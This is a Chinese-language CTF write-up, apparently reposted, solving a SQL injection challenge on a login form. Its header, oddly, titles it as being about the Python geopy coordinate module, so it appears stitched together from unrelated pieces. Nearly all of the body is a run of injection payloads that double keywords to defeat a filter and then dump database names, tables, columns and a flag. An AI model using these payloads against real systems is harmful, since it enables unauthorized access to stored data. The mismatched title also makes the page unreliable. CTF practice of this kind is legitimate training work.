python座標獲取經緯度或經緯度獲取座標免費模組--geopy
阿新 • • 發佈:2020-09-07
題目
拿到題目是一個登入框,結合題目來看,應該是個注入題
點選登入之後
分析
?username=admin&password=admin'
?username=admin&password=admin' oorr 1=1--+
?username=admin&password=admin' ununionion seselectlect 1,2,3--+
發現or,union,select都被過濾了,可以雙寫繞過
開始爆庫
?username=admin&password=admin' ununionion seselectlect 1,2,database()--+
發現當前連線的資料庫是geek
爆破所有的資料庫
?username=admin&password=pwd' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
我們發現了有一個ctf的庫,猜想可能從這個庫中得到flag(我們還是用geek這個庫演示)
爆表,此時注意information被過濾了or,from也被過濾了,還包括where所以都雙寫一下
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="geek" %23
爆ctf庫的表ctf庫的表 ,此處發現Flag表
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="ctf" %23
查Flag表中的欄位名都有什麼
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23
最後檢視欄位的資料
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
得到flag{09e4d1ce-896c-4ce8-a0cd-69a8b3297d28}